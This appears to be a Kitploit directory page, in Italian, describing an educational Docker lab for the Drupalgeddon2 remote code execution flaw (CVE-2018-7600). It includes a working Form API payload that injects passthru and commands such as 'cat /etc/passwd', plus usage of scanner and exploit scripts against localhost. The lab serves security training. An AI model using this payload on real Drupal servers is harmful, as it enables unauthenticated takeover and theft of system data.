Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2018-7600-drupalgeddon2-lab — Laboratorio educativo che dimostra CVE-2018-7600 (Drupalgeddon2) Remote Code Execution utilizzando un ambiente vulnerabile Drupal 7.56 basato su Docker. | Kitploit
Strumenti/GitHubGitHub/meraj1312/cve-2018-7600-drupalgeddon2-lab
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHub
meraj1312/cve-2018-7600-drupalgeddon2-lab

cve-2018-7600-drupalgeddon2-lab

Laboratorio educativo che dimostra CVE-2018-7600 (Drupalgeddon2) Remote Code Execution utilizzando un ambiente vulnerabile Drupal 7.56 basato su Docker.

Vedi Repository
1185 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-7600 Laboratorio Vulnerabilità Drupalgeddon2

Laboratorio didattico che dimostra lo sfruttamento di CVE-2018-7600 (Drupalgeddon2) utilizzando un ambiente Drupal 7.56 vulnerabile distribuito con Docker.

Questo progetto simula un flusso di lavoro reale di valutazione delle vulnerabilità, includendo:

  • Configurazione dell'ambiente vulnerabile
  • Rilevamento (scanner)
  • Sfruttamento (RCE)
  • Analisi del payload
  • Documentazione

Panoramica della Vulnerabilità

CVE-2018-7600 (Drupalgeddon2) è una vulnerabilità critica di Remote Code Execution (RCE) nel CMS Drupal.

Il problema esiste nell'API Form di Drupal, dove l'input controllato dall'utente può essere interpretato come array di rendering, consentendo agli aggressori di iniettare callback dannosi come:

  • passthru
  • system
  • exec

Ciò porta all'esecuzione di comandi non autenticati sul server.

Impatto

  • Esecuzione Remota di Comandi
  • Nessuna autenticazione richiesta
  • Compromissione totale del server

Versione Target

  • Drupal 7.56 (vulnerabile)

Architettura del Laboratorio


Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database


Tecnologie Utilizzate

  • Docker
  • Docker Compose
  • Drupal CMS
  • MySQL
  • Kali Linux
  • Python (Exploit e Scanner)

Struttura del Repository


cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│   └── docker-compose.yml
│
├── screenshots/
│   ├── drupal-dashboard.png
│   ├── drupal-version.png
│   └── rce-output.png
│
├── logs/
│   ├── scan_results.txt
│   └── exploit_log.txt
│
├── payloads/
│   └── payload-list.txt
│
├── report/
│   └── drupalgeddon2-report.pdf


Screenshot

Dashboard di Drupal

Dashboard di Drupal

Conferma della Versione

Versione di Drupal


Avvio Rapido

Clona il Repository

git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab

Avvia il Laboratorio

docker compose up -d

Accedi al Target

http://localhost:8080

Rilevamento e Sfruttamento

1. Scansione per la Vulnerabilità

python3 scan.py http://localhost:8080

Esempio di output:

[~] Scanning http://localhost:8080... VULNERABLE

2. Sfruttamento (RCE)

python3 exploit.py http://localhost:8080 id

Esempio di output:

uid=33(www-data) gid=33(www-data)

Esempio di Payload

Struttura base del payload utilizzata:

name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami

Comandi di esempio:

whoami
id
cat /etc/passwd

Elenco completo dei payload disponibile in:

payloads/payload-list.txt

Strategia di Documentazione

Per mantenere una struttura del repository pulita e professionale:

Il README contiene:

  • Panoramica della vulnerabilità
  • Istruzioni per la configurazione del laboratorio
  • Esempi base di payload
  • Come eseguire scanner ed exploit

Il Report PDF (report/drupalgeddon2-report.pdf) contiene:

  • Passaggi dettagliati di sfruttamento
  • Richieste e risposte di Burp Suite
  • Risultati dei test sui payload
  • Screenshot dell'esecuzione
  • Spiegazione tecnica della vulnerabilità

Questa separazione garantisce:

  • Presentazione pulita su GitHub
  • Documentazione tecnica completa

Scopo Educativo

Questo laboratorio è destinato a:

  • Studenti di cybersecurity
  • Pratica di penetration testing
  • Ricerca sulle vulnerabilità
  • Apprendimento dello sviluppo di exploit

Dichiarazione di Esclusione di Responsabilità

Questo progetto è solo per scopi educativi e di ricerca.

Non tentare di sfruttare sistemi senza esplicita autorizzazione.

Gli autori non sono responsabili per un uso improprio.

Scarica lo strumento